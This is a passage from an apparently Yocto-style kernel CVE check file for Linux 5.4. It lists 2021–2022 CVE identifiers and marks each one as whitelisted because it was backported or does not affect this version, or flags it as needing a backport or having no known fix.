6026CVE_CHECK_WHITELIST += "CVE-2021-47013"
6027
6028# fixed-version: only affects 5.8rc7 onwards
6029CVE_CHECK_WHITELIST += "CVE-2021-47014"
6030
6031# cpe-stable-backport: Backported in 5.4.119
6032CVE_CHECK_WHITELIST += "CVE-2021-47015"
6033
6034# cpe-stable-backport: Backported in 5.4.119
6035CVE_CHECK_WHITELIST += "CVE-2021-47016"
6036
6037# fixed-version: only affects 5.8rc1 onwards
6038CVE_CHECK_WHITELIST += "CVE-2021-47017"
6039
6040# fixed-version: only affects 5.5rc1 onwards
6041CVE_CHECK_WHITELIST += "CVE-2021-47018"
6042
6043# fixed-version: only affects 5.12rc1 onwards
6044CVE_CHECK_WHITELIST += "CVE-2021-47019"
6045
6046# cpe-stable-backport: Backported in 5.4.119
6047CVE_CHECK_WHITELIST += "CVE-2021-47020"
6048
6049# fixed-version: only affects 5.12rc1 onwards
6050CVE_CHECK_WHITELIST += "CVE-2021-47021"
6051
6052# fixed-version: only affects 5.12rc1 onwards
6053CVE_CHECK_WHITELIST += "CVE-2021-47022"
6054
6055# fixed-version: only affects 5.10rc1 onwards
6056CVE_CHECK_WHITELIST += "CVE-2021-47023"
6057
6058# CVE-2021-47024 needs backporting (fixed from 5.13rc1)
6059
6060# fixed-version: only affects 5.12rc1 onwards
6061CVE_CHECK_WHITELIST += "CVE-2021-47025"
6062
6063# fixed-version: only affects 5.8rc1 onwards
6064CVE_CHECK_WHITELIST += "CVE-2021-47026"
6065
6066# fixed-version: only affects 5.12rc1 onwards
6067CVE_CHECK_WHITELIST += "CVE-2021-47027"
6068
6069# CVE-2021-47028 needs backporting (fixed from 5.13rc1)
6070
6071# fixed-version: only affects 5.12rc1 onwards
6072CVE_CHECK_WHITELIST += "CVE-2021-47029"
6073
6074# fixed-version: only affects 5.12rc1 onwards
6075CVE_CHECK_WHITELIST += "CVE-2021-47030"
6076
6077# fixed-version: only affects 5.12rc1 onwards
6078CVE_CHECK_WHITELIST += "CVE-2021-47031"
6079
6080# fixed-version: only affects 5.10rc1 onwards
6081CVE_CHECK_WHITELIST += "CVE-2021-47032"
6082
6083# fixed-version: only affects 5.10rc1 onwards
6084CVE_CHECK_WHITELIST += "CVE-2021-47033"
6085
6086# cpe-stable-backport: Backported in 5.4.119
6087CVE_CHECK_WHITELIST += "CVE-2021-47034"
6088
6089# fixed-version: only affects 5.6rc1 onwards
6090CVE_CHECK_WHITELIST += "CVE-2021-47035"
6091
6092# fixed-version: only affects 5.6rc1 onwards
6093CVE_CHECK_WHITELIST += "CVE-2021-47036"
6094
6095# fixed-version: only affects 5.10rc1 onwards
6096CVE_CHECK_WHITELIST += "CVE-2021-47037"
6097
6098# fixed-version: only affects 5.7rc1 onwards
6099CVE_CHECK_WHITELIST += "CVE-2021-47038"
6100
6101# fixed-version: only affects 5.11rc1 onwards
6102CVE_CHECK_WHITELIST += "CVE-2021-47039"
6103
6104# fixed-version: only affects 5.8rc1 onwards
6105CVE_CHECK_WHITELIST += "CVE-2021-47040"
6106
6107# cpe-stable-backport: Backported in 5.4.119
6108CVE_CHECK_WHITELIST += "CVE-2021-47041"
6109
6110# fixed-version: only affects 5.12rc1 onwards
6111CVE_CHECK_WHITELIST += "CVE-2021-47042"
6112
6113# fixed-version: only affects 5.5rc1 onwards
6114CVE_CHECK_WHITELIST += "CVE-2021-47043"
6115
6116# fixed-version: only affects 5.10rc1 onwards
6117CVE_CHECK_WHITELIST += "CVE-2021-47044"
6118
6119# fixed-version: only affects 5.11rc1 onwards
6120CVE_CHECK_WHITELIST += "CVE-2021-47045"
6121
6122# CVE-2021-47046 needs backporting (fixed from 5.13rc1)
6123
6124# fixed-version: only affects 5.10rc1 onwards
6125CVE_CHECK_WHITELIST += "CVE-2021-47047"
6126
6127# fixed-version: only affects 5.10rc1 onwards
6128CVE_CHECK_WHITELIST += "CVE-2021-47048"
6129
6130# CVE-2021-47049 needs backporting (fixed from 5.13rc1)
6131
6132# fixed-version: only affects 5.9rc1 onwards
6133CVE_CHECK_WHITELIST += "CVE-2021-47050"
6134
6135# cpe-stable-backport: Backported in 5.4.119
6136CVE_CHECK_WHITELIST += "CVE-2021-47051"
6137
6138# CVE-2021-47052 needs backporting (fixed from 5.13rc1)
6139
6140# fixed-version: only affects 5.10rc1 onwards
6141CVE_CHECK_WHITELIST += "CVE-2021-47053"
6142
6143# cpe-stable-backport: Backported in 5.4.119
6144CVE_CHECK_WHITELIST += "CVE-2021-47054"
6145
6146# fixed-version: only affects 5.9rc1 onwards
6147CVE_CHECK_WHITELIST += "CVE-2021-47055"
6148
6149# cpe-stable-backport: Backported in 5.4.119
6150CVE_CHECK_WHITELIST += "CVE-2021-47056"
6151
6152# fixed-version: only affects 5.10rc1 onwards
6153CVE_CHECK_WHITELIST += "CVE-2021-47057"
6154
6155# fixed-version: only affects 5.11rc3 onwards
6156CVE_CHECK_WHITELIST += "CVE-2021-47058"
6157
6158# CVE-2021-47059 needs backporting (fixed from 5.13rc1)
6159
6160# fixed-version: only affects 5.9rc5 onwards
6161CVE_CHECK_WHITELIST += "CVE-2021-47060"
6162
6163# fixed-version: only affects 5.9rc5 onwards
6164CVE_CHECK_WHITELIST += "CVE-2021-47061"
6165
6166# fixed-version: only affects 5.11rc1 onwards
6167CVE_CHECK_WHITELIST += "CVE-2021-47062"
6168
6169# CVE-2021-47063 needs backporting (fixed from 5.13rc1)
6170
6171# fixed-version: only affects 5.10rc1 onwards
6172CVE_CHECK_WHITELIST += "CVE-2021-47064"
6173
6174# cpe-stable-backport: Backported in 5.4.119
6175CVE_CHECK_WHITELIST += "CVE-2021-47065"
6176
6177# fixed-version: only affects 5.10rc1 onwards
6178CVE_CHECK_WHITELIST += "CVE-2021-47066"
6179
6180# fixed-version: only affects 5.5rc1 onwards
6181CVE_CHECK_WHITELIST += "CVE-2021-47067"
6182
6183# fixed-version: only affects 5.12rc7 onwards
6184CVE_CHECK_WHITELIST += "CVE-2021-47068"
6185
6186# fixed-version: only affects 5.6rc1 onwards
6187CVE_CHECK_WHITELIST += "CVE-2021-47069"
6188
6189# CVE-2021-47070 needs backporting (fixed from 5.13rc3)
6190
6191# cpe-stable-backport: Backported in 5.4.122
6192CVE_CHECK_WHITELIST += "CVE-2021-47071"
6193
6194# fixed-version: only affects 5.12rc1 onwards
6195CVE_CHECK_WHITELIST += "CVE-2021-47072"
6196
6197# cpe-stable-backport: Backported in 5.4.122
6198CVE_CHECK_WHITELIST += "CVE-2021-47073"
6199
6200# CVE-2021-47074 needs backporting (fixed from 5.13rc3)
6201
6202# CVE-2021-47075 needs backporting (fixed from 5.13rc3)
6203
6204# CVE-2021-47076 needs backporting (fixed from 5.13rc3)
6205
6206# CVE-2021-47077 needs backporting (fixed from 5.13rc3)
6207
6208# cpe-stable-backport: Backported in 5.4.122
6209CVE_CHECK_WHITELIST += "CVE-2021-47078"
6210
6211# fixed-version: only affects 5.12rc1 onwards
6212CVE_CHECK_WHITELIST += "CVE-2021-47079"
6213
6214# fixed-version: only affects 5.10rc1 onwards
6215CVE_CHECK_WHITELIST += "CVE-2021-47080"
6216
6217# fixed-version: only affects 5.12rc1 onwards
6218CVE_CHECK_WHITELIST += "CVE-2021-47081"
6219
6220# cpe-stable-backport: Backported in 5.4.240
6221CVE_CHECK_WHITELIST += "CVE-2021-47082"
6222
6223# cpe-stable-backport: Backported in 5.4.169
6224CVE_CHECK_WHITELIST += "CVE-2021-47083"
6225
6226# cpe-stable-backport: Backported in 5.4.169
6227CVE_CHECK_WHITELIST += "CVE-2021-47086"
6228
6229# fixed-version: only affects 5.14rc5 onwards
6230CVE_CHECK_WHITELIST += "CVE-2021-47087"
6231
6232# fixed-version: only affects 5.15rc1 onwards
6233CVE_CHECK_WHITELIST += "CVE-2021-47088"
6234
6235# fixed-version: only affects 5.12rc1 onwards
6236CVE_CHECK_WHITELIST += "CVE-2021-47089"
6237
6238# fixed-version: only affects 5.10rc1 onwards
6239CVE_CHECK_WHITELIST += "CVE-2021-47090"
6240
6241# fixed-version: only affects 5.10rc1 onwards
6242CVE_CHECK_WHITELIST += "CVE-2021-47091"
6243
6244# fixed-version: only affects 5.15rc4 onwards
6245CVE_CHECK_WHITELIST += "CVE-2021-47092"
6246
6247# fixed-version: only affects 5.9 onwards
6248CVE_CHECK_WHITELIST += "CVE-2021-47093"
6249
6250# fixed-version: only affects 5.10rc1 onwards
6251CVE_CHECK_WHITELIST += "CVE-2021-47094"
6252
6253# cpe-stable-backport: Backported in 5.4.169
6254CVE_CHECK_WHITELIST += "CVE-2021-47095"
6255
6256# fixed-version: only affects 5.15rc4 onwards
6257CVE_CHECK_WHITELIST += "CVE-2021-47096"
6258
6259# fixed-version: only affects 5.11rc1 onwards
6260CVE_CHECK_WHITELIST += "CVE-2021-47097"
6261
6262# fixed-version: only affects 5.14rc1 onwards
6263CVE_CHECK_WHITELIST += "CVE-2021-47098"
6264
6265# fixed-version: only affects 5.13rc1 onwards
6266CVE_CHECK_WHITELIST += "CVE-2021-47099"
6267
6268# cpe-stable-backport: Backported in 5.4.169
6269CVE_CHECK_WHITELIST += "CVE-2021-47100"
6270
6271# CVE-2021-47101 needs backporting (fixed from 5.16rc7)
6272
6273# fixed-version: only affects 5.14rc1 onwards
6274CVE_CHECK_WHITELIST += "CVE-2021-47102"
6275
6276# cpe-stable-backport: Backported in 5.4.220
6277CVE_CHECK_WHITELIST += "CVE-2021-47103"
6278
6279# fixed-version: only affects 5.15 onwards
6280CVE_CHECK_WHITELIST += "CVE-2021-47104"
6281
6282# fixed-version: only affects 5.5rc1 onwards
6283CVE_CHECK_WHITELIST += "CVE-2021-47105"
6284
6285# fixed-version: only affects 5.13rc1 onwards
6286CVE_CHECK_WHITELIST += "CVE-2021-47106"
6287
6288# fixed-version: only affects 5.13rc1 onwards
6289CVE_CHECK_WHITELIST += "CVE-2021-47107"
6290
6291# fixed-version: only affects 5.14rc1 onwards
6292CVE_CHECK_WHITELIST += "CVE-2021-47108"
6293
6294# cpe-stable-backport: Backported in 5.4.125
6295CVE_CHECK_WHITELIST += "CVE-2021-47109"
6296
6297# cpe-stable-backport: Backported in 5.4.125
6298CVE_CHECK_WHITELIST += "CVE-2021-47110"
6299
6300# fixed-version: only affects 5.5rc1 onwards
6301CVE_CHECK_WHITELIST += "CVE-2021-47111"
6302
6303# cpe-stable-backport: Backported in 5.4.125
6304CVE_CHECK_WHITELIST += "CVE-2021-47112"
6305
6306# CVE-2021-47113 needs backporting (fixed from 5.13rc5)
6307
6308# cpe-stable-backport: Backported in 5.4.125
6309CVE_CHECK_WHITELIST += "CVE-2021-47114"
6310
6311# CVE-2021-47116 needs backporting (fixed from 5.13rc5)
6312
6313# cpe-stable-backport: Backported in 5.4.125
6314CVE_CHECK_WHITELIST += "CVE-2021-47117"
6315
6316# cpe-stable-backport: Backported in 5.4.125
6317CVE_CHECK_WHITELIST += "CVE-2021-47118"
6318
6319# CVE-2021-47119 needs backporting (fixed from 5.13rc5)
6320
6321# cpe-stable-backport: Backported in 5.4.125
6322CVE_CHECK_WHITELIST += "CVE-2021-47120"
6323
6324# cpe-stable-backport: Backported in 5.4.125
6325CVE_CHECK_WHITELIST += "CVE-2021-47121"
6326
6327# cpe-stable-backport: Backported in 5.4.125
6328CVE_CHECK_WHITELIST += "CVE-2021-47122"
6329
6330# fixed-version: only affects 5.11rc1 onwards
6331CVE_CHECK_WHITELIST += "CVE-2021-47123"
6332
6333# CVE-2021-47124 needs backporting (fixed from 5.13rc2)
6334
6335# CVE-2021-47125 needs backporting (fixed from 5.13rc5)
6336
6337# cpe-stable-backport: Backported in 5.4.125
6338CVE_CHECK_WHITELIST += "CVE-2021-47126"
6339
6340# fixed-version: only affects 5.12rc1 onwards
6341CVE_CHECK_WHITELIST += "CVE-2021-47127"
6342
6343# CVE-2021-47128 needs backporting (fixed from 5.13rc5)
6344
6345# cpe-stable-backport: Backported in 5.4.125
6346CVE_CHECK_WHITELIST += "CVE-2021-47129"
6347
6348# fixed-version: only affects 5.8rc1 onwards
6349CVE_CHECK_WHITELIST += "CVE-2021-47130"
6350
6351# CVE-2021-47131 needs backporting (fixed from 5.13rc5)
6352
6353# fixed-version: only affects 5.12rc1 onwards
6354CVE_CHECK_WHITELIST += "CVE-2021-47132"
6355
6356# CVE-2021-47133 needs backporting (fixed from 5.13rc5)
6357
6358# fixed-version: only affects 5.10rc1 onwards
6359CVE_CHECK_WHITELIST += "CVE-2021-47134"
6360
6361# CVE-2021-47135 needs backporting (fixed from 5.13rc5)
6362
6363# CVE-2021-47136 needs backporting (fixed from 5.13rc4)
6364
6365# cpe-stable-backport: Backported in 5.4.124
6366CVE_CHECK_WHITELIST += "CVE-2021-47137"
6367
6368# cpe-stable-backport: Backported in 5.4.124
6369CVE_CHECK_WHITELIST += "CVE-2021-47138"
6370
6371# fixed-version: only affects 5.6rc1 onwards
6372CVE_CHECK_WHITELIST += "CVE-2021-47139"
6373
6374# CVE-2021-47140 needs backporting (fixed from 5.13rc4)
6375
6376# cpe-stable-backport: Backported in 5.4.124
6377CVE_CHECK_WHITELIST += "CVE-2021-47141"
6378
6379# cpe-stable-backport: Backported in 5.4.124
6380CVE_CHECK_WHITELIST += "CVE-2021-47142"
6381
6382# CVE-2021-47143 needs backporting (fixed from 5.13rc4)
6383
6384# cpe-stable-backport: Backported in 5.4.124
6385CVE_CHECK_WHITELIST += "CVE-2021-47144"
6386
6387# cpe-stable-backport: Backported in 5.4.124
6388CVE_CHECK_WHITELIST += "CVE-2021-47145"
6389
6390# cpe-stable-backport: Backported in 5.4.124
6391CVE_CHECK_WHITELIST += "CVE-2021-47146"
6392
6393# CVE-2021-47147 needs backporting (fixed from 5.13rc4)
6394
6395# fixed-version: only affects 5.12rc1 onwards
6396CVE_CHECK_WHITELIST += "CVE-2021-47148"
6397
6398# cpe-stable-backport: Backported in 5.4.124
6399CVE_CHECK_WHITELIST += "CVE-2021-47149"
6400
6401# cpe-stable-backport: Backported in 5.4.124
6402CVE_CHECK_WHITELIST += "CVE-2021-47150"
6403
6404# CVE-2021-47151 needs backporting (fixed from 5.13rc4)
6405
6406# fixed-version: only affects 5.7rc1 onwards
6407CVE_CHECK_WHITELIST += "CVE-2021-47152"
6408
6409# cpe-stable-backport: Backported in 5.4.124
6410CVE_CHECK_WHITELIST += "CVE-2021-47153"
6411
6412# CVE-2021-47158 needs backporting (fixed from 5.13rc4)
6413
6414# cpe-stable-backport: Backported in 5.4.124
6415CVE_CHECK_WHITELIST += "CVE-2021-47159"
6416
6417# cpe-stable-backport: Backported in 5.4.124
6418CVE_CHECK_WHITELIST += "CVE-2021-47160"
6419
6420# cpe-stable-backport: Backported in 5.4.124
6421CVE_CHECK_WHITELIST += "CVE-2021-47161"
6422
6423# cpe-stable-backport: Backported in 5.4.124
6424CVE_CHECK_WHITELIST += "CVE-2021-47162"
6425
6426# cpe-stable-backport: Backported in 5.4.124
6427CVE_CHECK_WHITELIST += "CVE-2021-47163"
6428
6429# fixed-version: only affects 5.8rc1 onwards
6430CVE_CHECK_WHITELIST += "CVE-2021-47164"
6431
6432# cpe-stable-backport: Backported in 5.4.124
6433CVE_CHECK_WHITELIST += "CVE-2021-47165"
6434
6435# cpe-stable-backport: Backported in 5.4.124
6436CVE_CHECK_WHITELIST += "CVE-2021-47166"
6437
6438# cpe-stable-backport: Backported in 5.4.124
6439CVE_CHECK_WHITELIST += "CVE-2021-47167"
6440
6441# cpe-stable-backport: Backported in 5.4.124
6442CVE_CHECK_WHITELIST += "CVE-2021-47168"
6443
6444# cpe-stable-backport: Backported in 5.4.124
6445CVE_CHECK_WHITELIST += "CVE-2021-47169"
6446
6447# cpe-stable-backport: Backported in 5.4.124
6448CVE_CHECK_WHITELIST += "CVE-2021-47170"
6449
6450# cpe-stable-backport: Backported in 5.4.124
6451CVE_CHECK_WHITELIST += "CVE-2021-47171"
6452
6453# cpe-stable-backport: Backported in 5.4.124
6454CVE_CHECK_WHITELIST += "CVE-2021-47172"
6455
6456# cpe-stable-backport: Backported in 5.4.124
6457CVE_CHECK_WHITELIST += "CVE-2021-47173"
6458
6459# fixed-version: only affects 5.7rc1 onwards
6460CVE_CHECK_WHITELIST += "CVE-2021-47174"
6461
6462# CVE-2021-47175 needs backporting (fixed from 5.13rc4)
6463
6464# fixed-version: only affects 5.11rc1 onwards
6465CVE_CHECK_WHITELIST += "CVE-2021-47176"
6466
6467# cpe-stable-backport: Backported in 5.4.124
6468CVE_CHECK_WHITELIST += "CVE-2021-47177"
6469
6470# fixed-version: only affects 5.11rc1 onwards
6471CVE_CHECK_WHITELIST += "CVE-2021-47178"
6472
6473# cpe-stable-backport: Backported in 5.4.124
6474CVE_CHECK_WHITELIST += "CVE-2021-47179"
6475
6476# cpe-stable-backport: Backported in 5.4.123
6477CVE_CHECK_WHITELIST += "CVE-2021-47180"
6478
6479# cpe-stable-backport: Backported in 5.4.184
6480CVE_CHECK_WHITELIST += "CVE-2022-0001"
6481
6482# cpe-stable-backport: Backported in 5.4.184
6483CVE_CHECK_WHITELIST += "CVE-2022-0002"
6484
6485# CVE-2022-0168 needs backporting (fixed from 5.18rc1)
6486
6487# fixed-version: only affects 5.10rc1 onwards
6488CVE_CHECK_WHITELIST += "CVE-2022-0171"
6489
6490# cpe-stable-backport: Backported in 5.4.173
6491CVE_CHECK_WHITELIST += "CVE-2022-0185"
6492
6493# fixed-version: only affects 5.12rc1 onwards
6494CVE_CHECK_WHITELIST += "CVE-2022-0264"
6495
6496# fixed-version: only affects 5.9rc1 onwards
6497CVE_CHECK_WHITELIST += "CVE-2022-0286"
6498
6499# cpe-stable-backport: Backported in 5.4.155
6500CVE_CHECK_WHITELIST += "CVE-2022-0322"
6501
6502# cpe-stable-backport: Backported in 5.4.175
6503CVE_CHECK_WHITELIST += "CVE-2022-0330"
6504
6505# CVE-2022-0382 needs backporting (fixed from 5.16)
6506
6507# CVE-2022-0400 has no known resolution
6508
6509# fixed-version: only affects 5.16rc1 onwards
6510CVE_CHECK_WHITELIST += "CVE-2022-0433"
6511
6512# cpe-stable-backport: Backported in 5.4.179
6513CVE_CHECK_WHITELIST += "CVE-2022-0435"
6514
6515# CVE-2022-0480 needs backporting (fixed from 5.15rc1)
6516
6517# cpe-stable-backport: Backported in 5.4.179
6518CVE_CHECK_WHITELIST += "CVE-2022-0487"
6519
6520# cpe-stable-backport: Backported in 5.4.177
6521CVE_CHECK_WHITELIST += "CVE-2022-0492"
6522
6523# cpe-stable-backport: Backported in 5.4.193
6524CVE_CHECK_WHITELIST += "CVE-2022-0494"
6525
6526# fixed-version: only affects 5.10rc1 onwards
6527CVE_CHECK_WHITELIST += "CVE-2022-0500"
6528
6529# fixed-version: only affects 5.7rc1 onwards
6530CVE_CHECK_WHITELIST += "CVE-2022-0516"
6531
6532# cpe-stable-backport: Backported in 5.4.176
6533CVE_CHECK_WHITELIST += "CVE-2022-0617"
6534
6535# cpe-stable-backport: Backported in 5.4.156
6536CVE_CHECK_WHITELIST += "CVE-2022-0644"
6537
6538# fixed-version: only affects 5.17rc1 onwards
6539CVE_CHECK_WHITELIST += "CVE-2022-0646"
6540
6541# fixed-version: only affects 5.13rc1 onwards
6542CVE_CHECK_WHITELIST += "CVE-2022-0742"
6543
6544# cpe-stable-backport: Backported in 5.4.53
6545CVE_CHECK_WHITELIST += "CVE-2022-0812"
6546
6547# fixed-version: only affects 5.8rc1 onwards
6548CVE_CHECK_WHITELIST += "CVE-2022-0847"
6549
6550# cpe-stable-backport: Backported in 5.4.132
6551CVE_CHECK_WHITELIST += "CVE-2022-0850"
6552
6553# fixed-version: only affects 5.17rc6 onwards
6554CVE_CHECK_WHITELIST += "CVE-2022-0854"
6555
6556# fixed-version: only affects 5.8rc1 onwards
6557CVE_CHECK_WHITELIST += "CVE-2022-0995"
6558
6559# fixed-version: only affects 5.7rc1 onwards
6560CVE_CHECK_WHITELIST += "CVE-2022-0998"
6561
6562# cpe-stable-backport: Backported in 5.4.185
6563CVE_CHECK_WHITELIST += "CVE-2022-1011"
6564
6565# cpe-stable-backport: Backported in 5.4.197
6566CVE_CHECK_WHITELIST += "CVE-2022-1012"
6567
6568# fixed-version: only affects 5.12rc1 onwards
6569CVE_CHECK_WHITELIST += "CVE-2022-1015"
6570
6571# cpe-stable-backport: Backported in 5.4.188
6572CVE_CHECK_WHITELIST += "CVE-2022-1016"
6573
6574# fixed-version: only affects 5.12rc3 onwards
6575CVE_CHECK_WHITELIST += "CVE-2022-1043"
6576
6577# cpe-stable-backport: Backported in 5.4.193
6578CVE_CHECK_WHITELIST += "CVE-2022-1048"
6579
6580# cpe-stable-backport: Backported in 5.4.177
6581CVE_CHECK_WHITELIST += "CVE-2022-1055"
6582
6583# CVE-2022-1116 has no known resolution
6584
6585# cpe-stable-backport: Backported in 5.4.189
6586CVE_CHECK_WHITELIST += "CVE-2022-1158"
6587
6588# cpe-stable-backport: Backported in 5.4.198
6589CVE_CHECK_WHITELIST += "CVE-2022-1184"
6590
6591# cpe-stable-backport: Backported in 5.4.169
6592CVE_CHECK_WHITELIST += "CVE-2022-1195"
6593
6594# cpe-stable-backport: Backported in 5.4.189
6595CVE_CHECK_WHITELIST += "CVE-2022-1198"
6596
6597# cpe-stable-backport: Backported in 5.4.185
6598CVE_CHECK_WHITELIST += "CVE-2022-1199"
6599
6600# cpe-stable-backport: Backported in 5.4.190
6601CVE_CHECK_WHITELIST += "CVE-2022-1204"
6602
6603# fixed-version: only affects 5.17rc4 onwards
6604CVE_CHECK_WHITELIST += "CVE-2022-1205"
6605
6606# CVE-2022-1247 has no known resolution
6607
6608# CVE-2022-1263 needs backporting (fixed from 5.18rc3)
6609
6610# CVE-2022-1280 needs backporting (fixed from 5.15rc1)
6611
6612# cpe-stable-backport: Backported in 5.4.189
6613CVE_CHECK_WHITELIST += "CVE-2022-1353"
6614
6615# cpe-stable-backport: Backported in 5.4.21
6616CVE_CHECK_WHITELIST += "CVE-2022-1419"
6617
6618# cpe-stable-backport: Backported in 5.4.208
6619CVE_CHECK_WHITELIST += "CVE-2022-1462"
6620
6621# fixed-version: only affects 5.11rc1 onwards
6622CVE_CHECK_WHITELIST += "CVE-2022-1508"
6623
6624# fixed-version: only affects 5.7rc5 onwards
6625CVE_CHECK_WHITELIST += "CVE-2022-1516"
6626
6627# fixed-version: only affects 5.12rc1 onwards
6628CVE_CHECK_WHITELIST += "CVE-2022-1651"
6629
6630# cpe-stable-backport: Backported in 5.4.196
6631CVE_CHECK_WHITELIST += "CVE-2022-1652"
6632
6633# fixed-version: only affects 5.11rc1 onwards
6634CVE_CHECK_WHITELIST += "CVE-2022-1671"
6635
6636# fixed-version: Fixed after version 4.20rc1
6637CVE_CHECK_WHITELIST += "CVE-2022-1678"
6638
6639# cpe-stable-backport: Backported in 5.4.211
6640CVE_CHECK_WHITELIST += "CVE-2022-1679"
6641
6642# cpe-stable-backport: Backported in 5.4.196
6643CVE_CHECK_WHITELIST += "CVE-2022-1729"
6644
6645# cpe-stable-backport: Backported in 5.4.193
6646CVE_CHECK_WHITELIST += "CVE-2022-1734"
6647
6648# fixed-version: only affects 5.10rc1 onwards
6649CVE_CHECK_WHITELIST += "CVE-2022-1786"
6650
6651# CVE-2022-1789 needs backporting (fixed from 5.18)
6652
6653# cpe-stable-backport: Backported in 5.4.192
6654CVE_CHECK_WHITELIST += "CVE-2022-1836"
6655
6656# fixed-version: only affects 5.12rc1 onwards
6657CVE_CHECK_WHITELIST += "CVE-2022-1852"
6658
6659# fixed-version: only affects 5.17rc8 onwards
6660CVE_CHECK_WHITELIST += "CVE-2022-1882"
6661
6662# fixed-version: only affects 5.15rc1 onwards
6663CVE_CHECK_WHITELIST += "CVE-2022-1943"
6664
6665# cpe-stable-backport: Backported in 5.4.198
6666CVE_CHECK_WHITELIST += "CVE-2022-1966"
6667
6668# fixed-version: only affects 5.6rc1 onwards
6669CVE_CHECK_WHITELIST += "CVE-2022-1972"
6670
6671# fixed-version: only affects 5.15rc1 onwards
6672CVE_CHECK_WHITELIST += "CVE-2022-1973"
6673
6674# cpe-stable-backport: Backported in 5.4.193
6675CVE_CHECK_WHITELIST += "CVE-2022-1974"
6676
6677# cpe-stable-backport: Backported in 5.4.193
6678CVE_CHECK_WHITELIST += "CVE-2022-1975"
6679
6680# fixed-version: only affects 5.18rc2 onwards
6681CVE_CHECK_WHITELIST += "CVE-2022-1976"
6682
6683# fixed-version: only affects 5.13rc7 onwards
6684CVE_CHECK_WHITELIST += "CVE-2022-1998"
6685
6686# cpe-stable-backport: Backported in 5.4.181
6687CVE_CHECK_WHITELIST += "CVE-2022-20008"
6688
6689# cpe-stable-backport: Backported in 5.4.165
6690CVE_CHECK_WHITELIST += "CVE-2022-20132"
6691
6692# cpe-stable-backport: Backported in 5.4.145
6693CVE_CHECK_WHITELIST += "CVE-2022-20141"
6694
6695# CVE-2022-20148 needs backporting (fixed from 5.16rc1)
6696
6697# fixed-version: only affects 5.12rc1 onwards
6698CVE_CHECK_WHITELIST += "CVE-2022-20153"
6699
6700# cpe-stable-backport: Backported in 5.4.170
6701CVE_CHECK_WHITELIST += "CVE-2022-20154"
6702
6703# cpe-stable-backport: Backported in 5.4.187
6704CVE_CHECK_WHITELIST += "CVE-2022-20158"
6705
6706# CVE-2022-20166 needs backporting (fixed from 5.10rc1)
6707
6708# cpe-stable-backport: Backported in 5.4.187
6709CVE_CHECK_WHITELIST += "CVE-2022-20368"
6710
6711# cpe-stable-backport: Backported in 5.4.210
6712CVE_CHECK_WHITELIST += "CVE-2022-20369"
6713
6714# fixed-version: only affects 5.10rc1 onwards
6715CVE_CHECK_WHITELIST += "CVE-2022-20409"
6716
6717# cpe-stable-backport: Backported in 5.4.213
6718CVE_CHECK_WHITELIST += "CVE-2022-20421"
6719
6720# cpe-stable-backport: Backported in 5.4.211
6721CVE_CHECK_WHITELIST += "CVE-2022-20422"
6722
6723# fixed-version: only affects 5.17rc4 onwards
6724CVE_CHECK_WHITELIST += "CVE-2022-20423"
6725
6726# CVE-2022-20424 needs backporting (fixed from 5.12rc1)
6727
6728# cpe-stable-backport: Backported in 5.4.63
6729CVE_CHECK_WHITELIST += "CVE-2022-20565"
6730
6731# cpe-stable-backport: Backported in 5.4.209
6732CVE_CHECK_WHITELIST += "CVE-2022-20566"
6733
6734# fixed-version: Fixed after version 4.16rc5
6735CVE_CHECK_WHITELIST += "CVE-2022-20567"
6736
6737# fixed-version: only affects 5.7rc4 onwards
6738CVE_CHECK_WHITELIST += "CVE-2022-20568"
6739
6740# cpe-stable-backport: Backported in 5.4.197
6741CVE_CHECK_WHITELIST += "CVE-2022-20572"
6742
6743# fixed-version: only affects 5.6rc1 onwards
6744CVE_CHECK_WHITELIST += "CVE-2022-2078"
6745
6746# cpe-stable-backport: Backported in 5.4.199
6747CVE_CHECK_WHITELIST += "CVE-2022-21123"
6748
6749# cpe-stable-backport: Backported in 5.4.199
6750CVE_CHECK_WHITELIST += "CVE-2022-21125"
6751
6752# cpe-stable-backport: Backported in 5.4.199
6753CVE_CHECK_WHITELIST += "CVE-2022-21166"
6754
6755# fixed-version: Fixed after version 4.20
6756CVE_CHECK_WHITELIST += "CVE-2022-21385"
6757
6758# cpe-stable-backport: Backported in 5.4.197
6759CVE_CHECK_WHITELIST += "CVE-2022-21499"
6760
6761# cpe-stable-backport: Backported in 5.4.208
6762CVE_CHECK_WHITELIST += "CVE-2022-21505"
6763
6764# cpe-stable-backport: Backported in 5.4.211
6765CVE_CHECK_WHITELIST += "CVE-2022-2153"
6766
6767# fixed-version: only affects 5.8rc1 onwards
6768CVE_CHECK_WHITELIST += "CVE-2022-2196"
6769
6770# CVE-2022-2209 has no known resolution
6771
6772# cpe-stable-backport: Backported in 5.4.175
6773CVE_CHECK_WHITELIST += "CVE-2022-22942"
6774
6775# cpe-stable-backport: Backported in 5.4.184
6776CVE_CHECK_WHITELIST += "CVE-2022-23036"
6777
6778# cpe-stable-backport: Backported in 5.4.184
6779CVE_CHECK_WHITELIST += "CVE-2022-23037"
6780
6781# cpe-stable-backport: Backported in 5.4.184
6782CVE_CHECK_WHITELIST += "CVE-2022-23038"
6783
6784# cpe-stable-backport: Backported in 5.4.184
6785CVE_CHECK_WHITELIST += "CVE-2022-23039"
6786
6787# cpe-stable-backport: Backported in 5.4.184
6788CVE_CHECK_WHITELIST += "CVE-2022-23040"
6789
6790# cpe-stable-backport: Backported in 5.4.184
6791CVE_CHECK_WHITELIST += "CVE-2022-23041"
6792
6793# cpe-stable-backport: Backported in 5.4.184
6794CVE_CHECK_WHITELIST += "CVE-2022-23042"
6795
6796# fixed-version: only affects 5.15rc1 onwards
6797CVE_CHECK_WHITELIST += "CVE-2022-2308"
6798
6799# cpe-stable-backport: Backported in 5.4.204
6800CVE_CHECK_WHITELIST += "CVE-2022-2318"
6801
6802# CVE-2022-23222 needs backporting (fixed from 5.17rc1)
6803
6804# CVE-2022-2327 needs backporting (fixed from 5.12rc1)
6805
6806# cpe-stable-backport: Backported in 5.4.189
6807CVE_CHECK_WHITELIST += "CVE-2022-2380"
6808
6809# cpe-stable-backport: Backported in 5.4.217
6810CVE_CHECK_WHITELIST += "CVE-2022-23816"
6811
6812# CVE-2022-23825 has no known resolution
6813
6814# cpe-stable-backport: Backported in 5.4.184
6815CVE_CHECK_WHITELIST += "CVE-2022-23960"
6816
6817# fixed-version: only affects 5.14rc1 onwards
6818CVE_CHECK_WHITELIST += "CVE-2022-24122"
6819
6820# cpe-stable-backport: Backported in 5.4.176
6821CVE_CHECK_WHITELIST += "CVE-2022-24448"
6822
6823# cpe-stable-backport: Backported in 5.4.183
6824CVE_CHECK_WHITELIST += "CVE-2022-24958"
6825
